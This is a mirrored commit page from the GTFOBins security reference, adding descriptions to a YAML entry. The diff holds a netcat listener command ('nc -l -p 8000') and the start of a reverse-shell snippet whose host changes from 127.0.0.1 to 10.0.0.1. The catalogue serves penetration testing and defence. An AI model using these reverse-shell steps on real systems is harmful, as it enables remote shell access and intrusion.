mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-20 23:29:23 +02:00
Add missing descriptions
This commit is contained in:
@@ -9,8 +9,9 @@ functions:
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
- description: Run `nc -l -p 8000` to receive the shell on the other end.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
|
Reference in New Issue
Block a user